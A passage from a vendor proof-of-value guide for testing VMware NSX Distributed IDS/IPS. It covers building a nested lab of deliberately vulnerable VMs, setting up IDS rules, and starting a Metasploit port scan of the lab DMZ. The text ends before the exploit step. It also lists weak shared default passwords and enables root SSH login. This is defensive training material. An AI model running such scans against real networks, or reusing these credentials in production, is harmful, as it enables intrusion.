49 | The automation script is based on work done by [William Lam](https://github.com/lamw) with additional vSphere and NSX automation by [Madhu Krishnarao](https://github.com/madhukark)
50 |
51 | ---
52 | ## Changelog
53 |
54 | * **07/8/2020**
55 | * Initial partial draft of the guide
56 | * **08/18/2020**
57 | * Initial completed guide
58 | ---
59 | ## Intended Audience
60 | This PoV guide is intended for existing and future NSX customers who want to evaluate the NSX Distributed IDS/IPS functionality. Ideally, the PoV process involves people covering these roles:
61 |
62 | * CISO Representative
63 | * Data Center Infrastructure Team
64 | * Network Architects
65 | * Security Architects
66 | * Security Operations Center Analyst
67 | * Enterprise Application Owner
68 |
69 | ---
70 | ## Resources commitment and suggested timeline
71 | The expected time commitment to complete the PoV process is about 6 hours. This includes the time it takes for the automated deployment of the nested lab environment. We suggest splitting this time across two weeks. The below table provides an estimate of the time it takes to complete each task:
72 |
73 | | Task | Estimated Time to Complete | Suggested Week |
74 | | ------------- | ------------- | ------------- |
75 | | Customize Deployment Script Variables | 30 minutes | Week 1 |
76 | | Run Deployment Script | 90 minutes | Week 1 |
77 | | Verify Lab Deployment | 30 minutes | Week 1 |
78 | | Initial IDS/IPS Configuration | 30 minutes | Week 1 |
79 | | Simple Attack Scenario | 30 minutes | Week 1 |
80 | | Lateral Attack Scenario | 60 minutes | Week 2 |
81 | | Advanced Attack and configuration tuning | 60 minutes | Week 2 |
82 | | Apply micro-segmentation to limit the attack surface | 60 minutes | Week 2 |
83 |
84 | ---
85 | ## Support during the PoV Process
86 |
87 | Existing NSX customers should reach out to their NSX account team for support during the PoV process.
88 |
89 | ---
90 | ## Table of Contents
91 | * [Requirements](/docs/1-Requirements.md)
92 | * [Customize Deployment Script](/docs/2-CustomizeScript.md)
93 | * [Run Deployment Script](/docs/3-RunScript.md)
94 | * [Verify Lab Deployment](/docs/4-VerifyDeployment.md)
95 | * [Initial IDS/IPS Configuration](/docs/5-InitialConfiguration.md)
96 | * [Basic Attack Scenario](/docs/6-BasicAttackScenario.md)
97 | * [Lateral Movement Scenario](/docs/7-LateralMovementScenario.md)
98 | * [Advanced Exercises](/docs/8-AdvancedConfiguration.md)
99 | * [Segmenting the Environment](/docs/9-Segmentation.md)
100 | * [Conclusion](/docs/10-Conclusion.md)
101 |
102 | [***Next Step: 1. Requirements***](docs/1-Requirements.md)
103 |
--------------------------------------------------------------------------------
/docs/1-Requirements.md:
--------------------------------------------------------------------------------
1 |
2 | ## 1. Requirements
3 | ### Introduction to the Lab Deployment Script
4 | Along with this PoV guide, we are providing a [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment.ps1) which automates the lab environment deployment. This script makes it very easy for anyone to deploy a nested vSphere lab environment for learning and educational purposes. All required VMware components (ESXi, vCenter Server, NSX Unified Appliance and Edge) are automatically deployed, attacker and multiple victim workloads are deployed, and NSX-T networking configuration is applied, so that anyone can start testing the NSX Distributed IDS/IPS as soon as the deployment is completed.
5 |
6 | Below is a diagram of what is deployed as part of the solution. You simply need an existing vSphere environment, managed by vCenter Server, with enough resources (CPU, Memory and Storage) to deploy this "Nested" lab.
7 |
8 | 
9 |
10 | * Gray: Pre-requisites (Physical ESXi Server, vCenter managing the server and a Port group to provide connectivity for the nested lab environment)
11 | * Blue: Management and Edge Components (vCenter, NSX Manager and NSX Edge) Deployed by PowerCLI Script
12 | * Red: External VM running Metasploit and other functions deployed by PowerCLI Script on Physical Environment vCenter
13 | * Yellow: Nested ESXi hypervisors deployed by PowerCLI Script and managed by nested vCenter
14 | * Purple: vSAN datastore across 3 nested ESXi hypervisors configured by PowerCLI Script
15 | * Green: NSX Overlay DMZ Segment and vulnerable Web-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
16 | * Orange: NSX Overlay Internal Segment and vulnerable App-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
17 |
18 | ### Physical Lab Requirements
19 | Here are the requirements for NSX-T Distributed IDS/IPS Proof of Value.
20 |
21 | #### vCenter
22 | * vCenter Server running vSphere 6.7 or later
23 | * If your physical storage is vSAN, please ensure you've applied the following setting as mentioned [here](https://www.virtuallyghetto.com/2013/11/how-to-run-nested-esxi-on-top-of-vsan.html)
24 |
25 | #### Compute
26 | * Single Physical host running vSphere 6.7 or later
27 | * Ability to provision VMs with up to 8 vCPU
28 | * Ability to provision up to 64 GB of memory
29 |
30 | #### Network
31 | * Single pre-configured Standard or Distributed Portgroup (Management VLAN) used to connect the below components of the nested environment, in my example, VLAN-194 is used as this single port-group
32 | * 8 x IP Addresses for VCSA, ESXi, NSX-T Manager, Edge VM Management, Edge VM Uplink and External VM
33 | * 4 x IP Addresses for TEP (Tunnel Endpoint) interfaces on ESXi and Edge VM
34 | * 1 x IP Address for T0 Static Route (optional)
35 | * All IP Addresses should be able to communicate with each other. These can all be in the same subnet (/27). In the example configuration provided, the 10.114.209.128/27 subnet is used for all these IP addresses/interfaces: vCenter, NSX Manager Management Interface, T0 Router Uplink, Nested ESXi VMKernel and TEP interfaces (defined in IP pool), External VM.
36 |
37 | #### Storage
38 | * Ability to provision up to 1TB of storage
39 |
40 | #### Other
41 | * Desktop (Windows, Mac or Linux) with latest PowerShell Core and PowerCLI 12.0 Core installed. See [ instructions here](https://blogs.vmware.com/PowerCLI/2018/03/installing-powercli-10-0-0-macos.html) for more details
42 |
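If you already have PowerShell (Core) installed, PowerCLI can be installed from the PowerShell Gallery. A minimal sketch of the standard installation steps, shown here for convenience:

```console
# Install VMware PowerCLI from the PowerShell Gallery (run inside pwsh)
Install-Module -Name VMware.PowerCLI -Scope CurrentUser

# Labs typically use self-signed certificates; allow PowerCLI to connect to them
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -Confirm:$false
```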
43 |
44 | ### OVAs and images for the nested Lab
45 | * vSphere 7 & NSX-T OVAs:
46 | * [vCenter Server Appliance 7.0.0B](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=VC700B&productId=974&rPId=47905)
47 | * [NSX-T Manager 3.0.1 OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-301&productId=982&rPId=48086)
48 | * [NSX-T Edge 3.0.1 for ESXi OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-301&productId=982&rPId=48086)
49 | * [Nested ESXi 7.0 OVA - Build 15344619](https://download3.vmware.com/software/vmw-tools/nested-esxi/Nested_ESXi7.0_Appliance_Template_v1.ova)
50 | * External VM and Victim VM OVA - Links to these will be provided to PoV participants by their NSX account team.
51 | * Preferably, the deployed NSX Manager should have Internet access in order to download the latest set of IDS/IPS signatures.
52 |
53 | > **Note**: if you are not entitled or not able to access the above links, you can download a free trial and obtain a license for all of the above through https://www.vmware.com/try-vmware.html
54 |
55 |
56 |
57 | ---
58 |
59 | [***Next Step: 2. Customize Deployment Script***](/docs/2-CustomizeScript.md)
60 |
--------------------------------------------------------------------------------
/docs/10-Conclusion.md:
--------------------------------------------------------------------------------
1 | ## Conclusion
2 | Congratulations, you have now completed the NSX Distributed IDS/IPS lab/evaluation!
3 |
4 | Throughout this process, you should have discovered the unique benefits of having IDS/IPS built into the infrastructure versus bolted-on security controls.
5 | Please reach out to your VMware NSX representative with any feedback you have about the product or about the evaluation process.
6 |
7 | ## Additional Resources
8 | To learn more about the NSX Distributed IDS/IPS, check out the below resources:
9 | * [NSX Distributed IDS/IPS Overview page](https://www.vmware.com/products/nsx-distributed-ids-ips.html)
10 | * [NSX Service Defined Firewall Overview page](https://www.vmware.com/security/internal-firewall.html)
11 | * [Lightboard: Overview of the NSX Distributed IDS/IPS](https://www.youtube.com/watch?v=WUpq1kNfKB8)
12 | * [Demo: NSX Distributed IDS/IPS](https://www.youtube.com/watch?v=AGiwV9XsDk0)
13 | * [Demo: NSX Distributed IDS/IPS - Real-time threat detection interface and logging](https://www.youtube.com/watch?v=iaSgDUjhI-U)
14 | * [Demo: NSX Distributed IDS/IPS - Ransomware](https://www.youtube.com/watch?v=aFfhDRWk6n8)
15 | * [Demo: NSX Distributed IDS/IPS - Secure VDI](https://www.youtube.com/watch?v=24fF3iQhAOA)
16 |
17 |
--------------------------------------------------------------------------------
/docs/2-CustomizeScript.md:
--------------------------------------------------------------------------------
1 |
2 | ## 2. Customize Deployment Script Variables
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | Before you can run the [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment.ps1), you will need to [download](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment.ps1) and edit the script and update a number of variables to match your deployment environment. Each section is described below, including the actual values used in my sample lab environment. The variables that need to be adjusted are called out specifically. Other variables can in almost all cases be left at their default values.
6 |
7 | In the example below, I will be using a single /27 subnet (10.114.209.128/27) on a single port-group (VLAN-194) to which all the VMs provisioned by the automation script will be connected. It is expected that you will have a similar configuration, which is the most basic configuration for PoV and testing purposes.
8 |
9 | | Name | IP Address | Function | Default Credentials |
10 | |----------------------------|--------------------------------|------------------------------|------------------------------|
11 | | pov-vcsa | 10.114.209.143 | vCenter Server |administrator@vsphere.local/VMware1! |
12 | | Nested_ESXi_1 | 10.114.209.140 | ESXi |root/VMware1!
13 | | Nested_ESXi_2 | 10.114.209.141 | ESXi |root/VMware1!
14 | | Nested_ESXi_3 | 10.114.209.142 | ESXi |root/VMware1!
15 | | pov-nsx | 10.114.209.149 | NSX-T Manager |admin/VMware1!VMware1!
16 | | pov-nsx-edge | 10.114.209.150 | NSX-T Edge |admin/VMware1!
17 | | T0-uplink | 10.114.209.148 | T0 GW Interface IP |n.a.
18 | | TunnelEndpointGateway | 10.114.209.129 | Existing default GW |n.a.
19 | | T0 Static Default GW | 10.114.209.129 | Existing default GW |n.a.
20 | | TEP Pool | 10.114.209.144-10.114.209.147 | Tunnel Endpoint IPs |n.a.
21 | | External VM | 10.114.209.151 | Attacker (Metasploit) VM |vmware/VMware1!
22 |
23 | > **Note:** The remainder of this page contains the sections and variables within the script that should be modified to match the parameters of your environment. Other sections and variables within the script should be left at their pre-configured defaults.
24 |
25 | This section describes the credentials for your physical environment vCenter Server, to which the nested lab environment will be deployed. Make sure to adjust **all** of the below variables to match your physical environment vCenter:
26 | ```console
27 | # vCenter Server used to deploy vSphere with NSX lab
28 | $VIServer = "vcenter-north.lab.svanveer.pa"
29 | $VIUsername = "administrator@vsphere.local"
30 | $VIPassword = "VMware1!"
31 | ```
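Optionally, before running the full deployment, you can verify these credentials and basic connectivity by connecting to the physical vCenter from a PowerCLI session; a minimal sketch using the sample values above:

```console
# Quick connectivity/credential check against the physical vCenter (PowerCLI)
Connect-VIServer -Server "vcenter-north.lab.svanveer.pa" -User "administrator@vsphere.local" -Password "VMware1!"

# Disconnect once the login succeeds
Disconnect-VIServer -Server * -Confirm:$false
```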
32 |
33 | This section describes the location of the files required for deployment. This includes the OVAs for ESXi, NSX Manager and NSX Edge, the extracted bundle for vCenter, and the OVAs for the external and victim VMs. Update the below variables with the actual **location of the downloaded OVAs/extracted files** on the local machine you run this PowerShell script from.
34 |
35 | ```console
36 | # Full Path to both the Nested ESXi 7.0 VA, Extracted VCSA 7.0 ISO, NSX-T OVAs, External and Victim VM OVAs
37 | $NestedESXiApplianceOVA = "C:\Users\stijn\downloads\ESXI\Nested_ESXi7.0_Appliance_Template_v1.ova"
38 | $VCSAInstallerPath = "C:\Users\stijn\downloads\VCSA\VMware-VCSA-all-7.0.0-16189094"
39 | $NSXTManagerOVA = "C:\Users\stijn\downloads\NSXMgr\nsx-unified-appliance-3.0.0.0.0.15946739.ova"
40 | $NSXTEdgeOVA = "C:\Users\stijn\downloads\NSXEdge\nsx-edge-3.0.0.0.0.15946012.ova"
41 | $ExternalVMOVA = "C:\Users\stijn\downloads\Attacker\External-VM.ova"
42 | $VictimVMOVA = "C:\Users\stijn\downloads\Victim\Victim-VM.ova"
43 | ```
44 | > **Note:** The path to the VCSA Installer must be the extracted contents of the ISO
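As a quick sanity check, you can confirm each of these paths exists from PowerShell before launching the deployment; for example, using the sample paths above:

```console
# Each of these should return True before you run the deployment script
Test-Path "C:\Users\stijn\downloads\ESXI\Nested_ESXi7.0_Appliance_Template_v1.ova"
Test-Path "C:\Users\stijn\downloads\VCSA\VMware-VCSA-all-7.0.0-16189094"
Test-Path "C:\Users\stijn\downloads\NSXMgr\nsx-unified-appliance-3.0.0.0.0.15946739.ova"
```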
45 |
46 |
47 | This section defines the number of Nested ESXi VMs to deploy along with their associated IP address(es). The names are merely the display names of the VMs when deployed. At a minimum, you should deploy at least three hosts, but you can always add additional hosts and the script will automatically take care of provisioning them correctly. Adjust the **IP addresses** for the 3 below hosts. For simplicity, these IP addresses should be part of the same Management subnet as the nested vCenter and NSX Manager.
48 | ```console
49 | # Nested ESXi VMs to deploy - Replace IP addresses (nested ESXi VMkernel NIC) to match the assigned subnet in your physical environment
50 | $NestedESXiHostnameToIPs = @{
51 | "Nested_ESXi_1" = "10.114.209.140"
52 | "Nested_ESXi_2" = "10.114.209.141"
53 | "Nested_ESXi_3" = "10.114.209.142"
54 | }
55 | ```
56 |
57 | This section describes the VCSA deployment configuration, such as the VCSA deployment size, networking & SSO configurations. If you have ever used the VCSA CLI Installer, these options should look familiar. Adjust the **IP address** and **Prefix (Subnet Mask Bits)** to match the desired IP address of the nested vCenter appliance. Use the same IP address as the **hostname**, unless you can add an FQDN entry to your DNS server.
58 | ```console
59 | $VCSADeploymentSize = "tiny"
60 | $VCSADisplayName = "pov-vcsa"
61 | $VCSAIPAddress = "10.114.209.143" #Set to the desired IP address
62 | $VCSAHostname = "10.114.209.143" #Use IP if you don't have valid DNS.
63 | $VCSAPrefix = "27" #Set to the appropriate prefix
64 | $VCSASSODomainName = "vsphere.local"
65 | $VCSASSOPassword = "VMware1!"
66 | $VCSARootPassword = "VMware1!"
67 | $VCSASSHEnable = "true"
68 | ```
69 |
70 | This section describes the physical location as well as the generic networking settings applied to the Nested ESXi, VCSA & NSX VMs. The following variables should be defined by users: **VMDatacenter**, **VMCluster**, **VMNetwork** and **VMDatastore**. Replace all the **IP addresses** and **netmasks** with the appropriate values to match your physical environment. For the other values, the defaults are sufficient.
71 | ```console
72 | $VMDatacenter = "PaloAlto-Main" # Existing Datacenter on the Physical vCenter
73 | $VMCluster = "Physical-3" #Existing Cluster in the above Datacenter on the Physical vCenter
74 | $VMNetwork = "VLAN-194" #Existing port-group on the physical host/ to use and connect all deployed workloads (except for victim VMs) to
75 | $VMDatastore = "NFS" #Existing Datastore on the physical host/vCenter
76 | $VMNetmask = "255.255.255.224" #Netmask of the designated existing subnet which will be used to connect all deployed workloads (except for victim VMs) to
77 | $VMGateway = "10.114.209.129" #Existing Gateway allowing lab management components to reach the outside environment
78 | $VMDNS = "10.114.222.70" #Existing DNS server that will be configured on lab management components
79 | $VMNTP = "10.20.145.1" #Existing NTP server that will be configured on lab management components
80 | $VMPassword = "VMware1!"
81 | $VMDomain = "lab.svanveer.pa"
82 | $VMSyslog = "" # Do not set this unless you want to send logs to an existing and reachable Syslog collector/SIEM.
83 | $VMFolder = "NSX PoV" #The deployment script will create this folder
84 | ```
85 |
86 | This section describes the NSX-T configuration. The following variables must be defined by users and the rest can be left as defaults:
87 | **$NSXLicenseKey**, **$NSXVTEPNetwork**, **$T0GatewayInterfaceAddress**, **$T0GatewayInterfacePrefix**, **$T0GatewayInterfaceStaticRouteAddress** and the **NSX-T Manager**, **TEP IP Pool** and **Edge** sections.
88 | ```console
89 | # NSX-T Configuration - Adjust variables (license key, VTEPNetwork) to match your environment
90 | $NSXLicenseKey = "xxxxx-xxxxx-xxxxx-xxxxx-xxxxx" #Replace with valid NSX License key
91 | $NSXRootPassword = "VMware1!VMware1!"
92 | $NSXAdminUsername = "admin"
93 | $NSXAdminPassword = "VMware1!VMware1!"
94 | $NSXAuditUsername = "audit"
95 | $NSXAuditPassword = "VMware1!VMware1!"
96 | $NSXSSHEnable = "true"
97 | $NSXEnableRootLogin = "true"
98 | $NSXVTEPNetwork = "VLAN-194" # Replace with the appropriate pre-existing port-group
99 |
100 | # TEP IP Pool - Replace IP addresses to match the physical environment subnet you've allocated (i.e management network)
101 | $TunnelEndpointName = "TEP-IP-Pool"
102 | $TunnelEndpointDescription = "Tunnel Endpoint for Transport Nodes"
103 | $TunnelEndpointIPRangeStart = "10.114.209.144"
104 | $TunnelEndpointIPRangeEnd = "10.114.209.147"
105 | $TunnelEndpointCIDR = "10.114.209.128/27"
106 | $TunnelEndpointGateway = "10.114.209.129" #Default Gateway of the Management Network
107 |
108 | # T0 Gateway - Adjust T0GatewayInterfaceAddress and Prefix as well as StaticRoute Address
109 | $T0GatewayName = "PoV-T0-Gateway"
110 | $T0GatewayInterfaceAddress = "10.114.209.148" # should be a routable address
111 | $T0GatewayInterfacePrefix = "27" #adjust to the correct prefix for your environment
112 | $T0GatewayInterfaceStaticRouteName = "PoV-Static-Route"
113 | $T0GatewayInterfaceStaticRouteNetwork = "0.0.0.0/0"
114 | $T0GatewayInterfaceStaticRouteAddress = "10.114.209.129" # IP address of the next hop router in your environment. This can be set to an invalid IP address to ensure the vulnerable workloads remain isolated from the rest of the environment
115 |
116 | # NSX-T Manager Configurations - Replace IP addresses
117 | $NSXTMgrDeploymentSize = "small"
118 | $NSXTMgrvCPU = "4"
119 | $NSXTMgrvMEM = "16"
120 | $NSXTMgrDisplayName = "pov-nsx-manager"
121 | $NSXTMgrHostname = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
122 | $NSXTMgrIPAddress = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
123 |
124 | # NSX-T Edge Configuration
125 | $NSXTEdgeDeploymentSize = "medium"
126 | $NSXTEdgevCPU = "4"
127 | $NSXTEdgevMEM = "8"
128 | $NSXTEdgeName = "poc-nsx-edge"
129 | $NSXTEdgeHostnameToIPs = @{
130 | $NSXTEdgeName = "10.114.209.150" #Replace with the desired IP address for the NSX Edge Management Interface
131 |
132 | }
133 | ```
134 |
135 | ---
136 |
137 | [***Next Step: 3. Run Deployment Script***](/docs/3-RunScript.md)
138 |
--------------------------------------------------------------------------------
/docs/3-RunScript.md:
--------------------------------------------------------------------------------
1 | ## 3. Run Deployment Script
2 | **Estimated Time to Complete: 90 minutes**
3 | Once you have saved your changes, you can now run the PowerCLI script as you normally would.
4 |
5 | Here is a screenshot of running the script if all basic pre-reqs have been met and the confirmation message before starting the deployment:
6 | 
7 |
8 | Once the deployment completes, you will receive a confirmation and can now move on with the next step:
9 | 
10 |
11 |
12 | > **Note**: Deployment time will vary based on underlying physical infrastructure resources. On average, it can take between 45 and 90 minutes.
13 |
14 | ---
15 |
16 | [***Next Step: 4. Verify Lab Deployment***](/docs/4-VerifyDeployment.md)
17 |
--------------------------------------------------------------------------------
/docs/4-VerifyDeployment.md:
--------------------------------------------------------------------------------
1 |
2 | ## 4. Verify Lab Deployment
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | Once the Deployment Script has completed the installation and setup process, your lab environment is fully ready to start testing the NSX Distributed IDS/IPS. Verify vCenter and NSX have been configured as intended.
6 |
7 | **Physical Infrastructure Host/vCenter**
8 |
9 | 
10 |
11 | **Logical Nested Lab**
12 | 
13 |
14 | **Validate VM Deployment in the physical Environment**
15 |
16 | Log in to the physical environment vCenter and verify 6 VMs have been deployed, are up and running, and are connected to the appropriate port-group:
17 | * 3 nested ESXi
18 | * 1 NSX Manager
19 | * 1 NSX Edge
20 | * 1 vCenter
21 | * 1 External VM
22 |
23 | 
24 |
25 | Confirm you are able to ping each nested ESXi, the Lab NSX Manager and the Lab vCenter.
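For example, from your desktop, using the sample addressing from this guide (substitute your own addresses):

```console
# Basic reachability checks against the nested lab components
ping 10.114.209.140   # Nested_ESXi_1
ping 10.114.209.149   # Lab NSX Manager
ping 10.114.209.143   # Lab vCenter
```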
26 |
27 | **Configure IP address and static route on the External VM**
28 |
29 | 
30 |
31 | You will need to manually change the IP address of the external VM to an IP address in the same management subnet you used for vCenter/NSX Manager and the rest of the environment. You will also need to adjust the static route so the external VM is able to reach the DMZ subnet inside the nested lab environment; an example configuration is shown after the steps below. There is no need to configure a default gateway, as the only route the external VM needs is to the DMZ segment.
32 |
33 | From the physical environment vCenter, open a console to **External VM** and take the following steps:
34 | * Login with **vmware**/**VMware1!**
35 | * Type **sudo nano /etc/network/interfaces** to open the network configuration file
36 | 
37 | * For interface **ens160**, change the **address** and **netmask** to match the appropriate settings for your environment
38 | * In the line that starts with **up route add**, change the **gw address** (10.114.209.148 in my example) to the **T0 Uplink interface IP address**
39 | * Type **^O** (**Control-O**) to save the changes in Nano.
40 | * Type **^X** (**Control-X**) to exit Nano.
41 | * Type **sudo ip addr flush ens160** to clear the previously set IP address
42 | * Type **sudo systemctl restart networking.service** to restart the networking service and apply the new IP address.
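For reference, the relevant stanza of **/etc/network/interfaces** may end up looking like the sketch below. This is a hypothetical example based on the sample addressing in this guide; the address, netmask, DMZ subnet and T0 uplink gateway must match your own deployment:

```console
# Example /etc/network/interfaces stanza for the External VM (sample addressing)
auto ens160
iface ens160 inet static
    address 10.114.209.151
    netmask 255.255.255.224
    # Static route to the nested DMZ segment via the T0 uplink interface
    up route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.114.209.148
```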
43 |
44 | **Verify Nested Lab vCenter**
45 |
46 | Log in to the lab vCenter and verify the cluster of 3 nested ESXi appliances is functional and that 4 vulnerable VMs have been deployed on the cluster:
47 | * APP-1-WEB-TIER connected to **DMZSegment** Portgroup
48 | * APP-2-WEB-TIER connected to **DMZSegment** Portgroup
49 | * APP-1-APP-TIER connected to **InternalSegment** Portgroup
50 | * APP-2-APP-TIER connected to **InternalSegment** Portgroup
51 |
52 | 
53 |
54 | **Verify Network Segments were created**
55 |
56 | 1. Log in to the Lab NSX Manager Web-UI.
57 | 2. In the NSX Manager UI, navigate to Networking --> Segments --> Segments
58 | 3. Verify 3 segments have been deployed
59 | * **DMZSegment** - Overlay-based segment connecting the Web-tier workloads
60 | * **InternalSegment** - Overlay-based segment connecting the App-tier workloads
61 | * **PoC-Segment** - VLAN-backed segment providing uplink and management connectivity
62 |
63 | 
64 |
65 | **Determine the IP address of every nested workload**
66 |
67 | 1. In the NSX Manager UI, navigate to Inventory --> Virtual Machines
68 | 2. Click **View Details**
69 | 3. Note the IP addresses for the 4 VMs that were deployed. You will need to know which IP address has been assigned to each workload in the next exercises.
70 |
71 | 
72 | 
73 |
74 | > **Note**: DHCP Server has been pre-configured on NSX and should be assigning an IP address to each of the deployed nested workloads on the DMZ and Internal segments.
75 |
76 |
77 | **Confirm NAT configuration**
78 |
79 | 
80 |
81 | 1. In the NSX Manager UI, navigate to Networking --> NAT
82 | 2. Confirm a single **SNAT** rule exists, with the **Internal Subnet** as a source, and the **T0 Uplink** IP address as the translated address (10.114.209.148 in my example).
83 |
84 | 
85 |
86 | > **Note**: This NAT rule enables internal VMs to initiate communication with the outside world.
87 |
88 |
89 | **Confirm TAG Creation and Application**
90 |
91 | 
92 |
93 | 1. In the NSX Manager UI, navigate to Inventory --> Tags
94 | 2. Confirm 6 tags have been added as per the below screenshot
95 | 
96 | 3. Confirm tags were applied to workloads as per the above diagram
97 |
98 | This completes Lab Deployment Verification. You can now move to the next exercise.
99 |
100 | ---
101 |
102 | [***Next Step: 5. Initial IDS/IPS Configuration***](/docs/5-InitialConfiguration.md)
103 |
--------------------------------------------------------------------------------
/docs/5-InitialConfiguration.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 5. Initial IDS/IPS Configuration
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | > **Note**: If you are running through this PoV/evaluation process using a VMware-hosted (OneCloud/HoL) environment, you can skip all the previous modules and start with this lab module (5), as everything has already been deployed.
7 |
8 | Now that we have verified the lab has been deployed correctly, basic NSX networking configuration has been applied, and the appropriate vulnerable application VMs have been deployed, we can configure the NSX Distributed IDS/IPS.
9 |
10 | **Create Groups**
11 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
12 | 2. Click **ADD GROUP**
13 | 3. Create a Group with the below parameters. Click Save when done.
14 | * Name **Production Applications**
15 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Production Scope Environment**
16 | 
17 | 4. Create another Group with the below parameters. Click Save when done.
18 | * Name **Development Applications**
19 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Development Scope Environment**
20 | 
21 | 5. Confirm previously deployed VMs became members of the appropriate groups due to the applied tags. Click **View Members** for the 2 groups you created and confirm:
22 | * Members of **Development Applications**: **APP-2-APP-TIER**, **APP-2-WEB-TIER**
23 | * Members of **Production Applications**: **APP-1-APP-TIER**, **APP-1-WEB-TIER**
24 | 
25 |
26 | > **Note**: Tags were applied to the workloads through the Powershell script used to deploy the lab environment.
27 |
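Optionally, groups can also be inspected through the NSX Policy REST API; a minimal sketch, assuming the sample NSX Manager address and admin credentials used elsewhere in this guide:

```console
# List the groups defined in the default domain via the NSX Policy API
curl -k -u admin:'VMware1!VMware1!' https://10.114.209.149/policy/api/v1/infra/domains/default/groups
```
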
28 | **Enable Intrusion Detection**
29 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS --> Settings
30 | 2. Under Enable Intrusion Detection for Cluster(s), set **Workload-Cluster** to Enabled
31 |
32 | 
33 |
34 | NSX can automatically update its IDS signatures by checking our cloud-based service. By default, NSX Manager will check once per day, and we publish new signature update versions every two weeks (with additional non-scheduled 0-day updates). NSX can also be configured to optionally automatically apply newly updated signatures to all hosts that have IDS enabled.
35 |
36 | **Enable Automated Signature Update propagation**
37 | 1. Under Intrusion Detection Signatures, select **Auto Update new versions (recommended)** in order to propagate the latest signature updates from the cloud to the distributed IDS instances
38 | 2. Optionally, click **View and Change Versions** and expand one of the signature sets to see what signatures have been added/updated/disabled in this particular release
39 |
40 | > **Note**: if a proxy server is configured for NSX Manager to access the internet, click Proxy Settings and complete the configuration
41 |
42 |
43 | **Create IDS Profiles**
44 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS --> Profiles
45 | 2. Click **ADD IDS PROFILE**
46 | 3. Create an IDS Profile with the below parameters. Click Save when done.
47 | * Name **Production**
48 | * Signatures to Include: **Critical**, **High**, **Medium**
49 | 4. Create another IDS Profile with the below parameters. Click Save when done.
50 | * Name **Development**
51 | * Signatures to Include: **Critical**, **High**
52 |
53 | 
54 |
55 | **Create IDS Rules**
56 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS --> Rules
57 | 2. Click **ADD POLICY**
58 | 3. Create an IDS Policy named **NSX PoV**.
59 | 4. Check the checkbox for the policy you just created and click **ADD RULE**.
60 | 5. Add an IDS Rule with the following parameters
61 | * Name **Production Applications IDS Policy**
62 | * IDS Profile **Production**
63 | * Applied to **Production Applications** (group)
64 | * Leave other settings to defaults
65 | 6. Add another IDS Rule with the following parameters
66 | * Name **Development Applications IDS Policy**
67 | * IDS Profile **Development**
68 | * Applied to **Development Applications** (group)
69 | * Leave other settings to defaults
70 | 7. Click **Publish**
71 |
72 | 
73 |
74 | You have now successfully configured the NSX Distributed IDS/IPS! In the next exercise, we will run through a basic attack scenario to confirm intrusion attempts are detected and to get familiar with the NSX IDS/IPS Events view.
75 |
76 | ---
77 |
78 | [***Next Step: 6. Basic Attack Scenario***](/docs/6-BasicAttackScenario.md)
79 |
--------------------------------------------------------------------------------
/docs/6-BasicAttackScenario.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 6. Basic Attack Scenario
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | In this exercise, we will use **Metasploit** to launch a simple exploit against the **Drupal** service running on the **App1-WEB-TIER VM** and confirm the NSX Distributed IDS/IPS was able to detect this exploit attempt.
7 |
8 | 
9 |
10 | **Open a SSH/Console session to the External VM**
11 | 1. If your computer has access to the IP address you've assigned to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Log in with the below credentials.
12 | * Username **vmware**
13 | * Password **VMware1!**
14 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
15 |
16 | **Initiate port-scan against the DMZ Segment**
17 | 1. Type **sudo msfconsole** to launch **Metasploit**. Follow the below steps to initiate a portscan and discover any running services on the **DMZ** subnet. Hit **enter** after every command.
18 | * Type **use auxiliary/scanner/portscan/tcp** to select the portscan module
19 | * Type **set THREADS 50**
20 | * Type **set RHOSTS 192.168.10.0/24** to define the subnet to scan. This should match the **DMZ** subnet
21 | * Type **set PORTS 8080,5984** to define the ports to scan (Drupal and CouchDB servers)
22 | * Type **run**
23 |
24 | ```console
25 | vmware@ubuntu:~$sudo msfconsole
26 |
27 | IIIIII dTb.dTb _.---._
28 | II 4' v 'B .'"".'/|\`.""'.
29 | II 6. .P : .' / | \ `. :
30 | II 'T;. .;P' '.' / | \ `.'
31 | II 'T; ;P' `. / | \ .'
32 | IIIIII 'YvP' `-.__|__.-'
33 |
34 | I love shells --egypt
35 |
36 |
37 | =[ metasploit v5.0.95-dev ]
38 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
39 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
40 | + -- --=[ 7 evasion ]
41 |
42 | Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it with setg RHOSTS x.x.x.x
43 | msf5 > use auxiliary/scanner/portscan/tcp
44 | msf5 auxiliary(scanner/portscan/tcp) > set THREADS 50
45 | THREADS => 50
46 | msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.10.0/24
47 | RHOSTS => 192.168.10.0/24, 192.168.20.0/24
48 | msf5 auxiliary(scanner/portscan/tcp) > set PORTS 8080,5984
49 | PORTS => 8080,5984
50 | msf5 auxiliary(scanner/portscan/tcp) > run
51 | ```
52 | 2. You should see the below results when the scan completes
53 | ```console
